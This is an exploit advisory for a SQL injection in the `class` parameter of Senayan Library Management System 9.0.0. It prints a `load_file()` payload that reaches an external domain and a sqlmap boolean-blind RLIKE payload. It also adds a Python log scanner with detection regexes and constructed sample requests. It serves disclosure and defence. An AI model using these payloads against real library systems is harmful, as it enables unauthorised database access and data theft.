
## Exploit Title: Senayan Library Management System v9.0.0 - SQL Injection
## Author: nu11secur1ty
## Date: 11.09.2022
## Vendor: https://slims.web.id/web/
## Software: https://github.com/slims/slims9_bulian/releases/download/v9.0.0/slims9_bulian-9.0.0.zip
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.0.0/SQLi

## Description:

Manual insertion point 3, the `class` parameter, appears to be vulnerable to SQL injection.

The payload `'+(select load_file('\\\\0absu0byc9uwy8ivftx7f6auul0fo5cwfk6at2hr.again.com\\fbe'))+'` was submitted in manual insertion point 3.

This payload injects a SQL sub-query that calls MySQL's `load_file` function with a UNC file path pointing at a host on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed.

## STATUS: HIGH Vulnerability

[+] Payload:

```MySQL
---
Parameter: class (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: reportView=true&year=2002&class=bbbb''' RLIKE (SELECT (CASE WHEN (2547=2547) THEN 0x626262622727 ELSE 0x28 END)) AND 'dLjf'='dLjf&membershipType=a&collType=aaaa
---
```
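As an added defensive example (not part of this advisory or of the SLiMS project), the following Python scans web-server access logs for the two probe shapes shown on this page: the RLIKE / CASE WHEN boolean-based blind payload from the sqlmap output above and the `load_file()` UNC path from the description. The log lines, client addresses, the `/report` path and the `oob.example.invalid` host are constructed placeholders; the advisory names only the parameters, not the vulnerable endpoint.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Signatures derived from the two payloads in this advisory: the boolean-based
# blind probe (RLIKE ... CASE WHEN) and the out-of-band load_file() UNC read.
SQLI_PATTERNS = {
    "rlike_boolean_blind": re.compile(r"RLIKE\s*\(\s*SELECT\b", re.IGNORECASE),
    "case_when_oracle": re.compile(r"\bCASE\s+WHEN\s*\(", re.IGNORECASE),
    "load_file_unc": re.compile(r"load_file\s*\(\s*'\\{2,}", re.IGNORECASE),
}
# Combined access-log format: client IP first, request target inside the quoted request line.
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')


def decode_params(target: str) -> dict:
    """URL-decode the query string twice so a double-encoded payload is not missed.
    parse_qs does the first pass; unquote() does the second without touching '+'."""
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    return {k: [unquote(v) for v in vs] for k, vs in params.items()}


def classify_request(target: str) -> list:
    """Return (parameter, signature) pairs for every decoded value that matches."""
    hits = []
    for param, values in decode_params(target).items():
        for value in values:
            hits.extend((param, name) for name, rx in SQLI_PATTERNS.items() if rx.search(value))
    return hits


def scan_log(log_text: str) -> list:
    """Run classify_request over each access-log line; one finding dict per hit."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than fail
        client, target = m.groups()
        findings.extend({"client": client, "param": p, "signature": s}
                        for p, s in classify_request(target))
    return findings


# Constructed sample lines, not captured traffic. "/report" is a placeholder path
# and oob.example.invalid a placeholder host: the advisory names only the parameters.
SAMPLE_LOG = (
    '10.0.0.5 - - [11/Sep/2022:10:00:01 +0000] "GET /report?reportView=true&year=2002&class=bbbb%27%27%27+RLIKE+%28SELECT+%28CASE+WHEN+%282547%3D2547%29'
    '+THEN+0x626262622727+ELSE+0x28+END%29%29+AND+%27dLjf%27%3D%27dLjf&membershipType=a&collType=aaaa HTTP/1.1" 200 5120\n'
    '10.0.0.5 - - [11/Sep/2022:10:00:02 +0000] "GET /report?reportView=true&year=2002&class='
    '%27%2B%28select+load_file%28%27%5C%5C%5C%5Coob.example.invalid%5C%5Cfbe%27%29%29%2B%27 HTTP/1.1" 200 5120\n'
    '10.0.0.9 - - [11/Sep/2022:10:00:03 +0000] "GET /report?reportView=true&year=2022&class=Fiction&membershipType=Staff&collType=Reference HTTP/1.1" 200 4096\n'
)
```

Feeding `SAMPLE_LOG` to `scan_log` yields three findings, all on the `class` parameter from 10.0.0.5, while the ordinary report request from 10.0.0.9 produces none.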

## Reproduce:

[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.0.0/SQLi)

## Proof and Exploit:

[href](http://localhost:5001/sy5wji)

## Time spent

`03:00:00`

System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/, https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>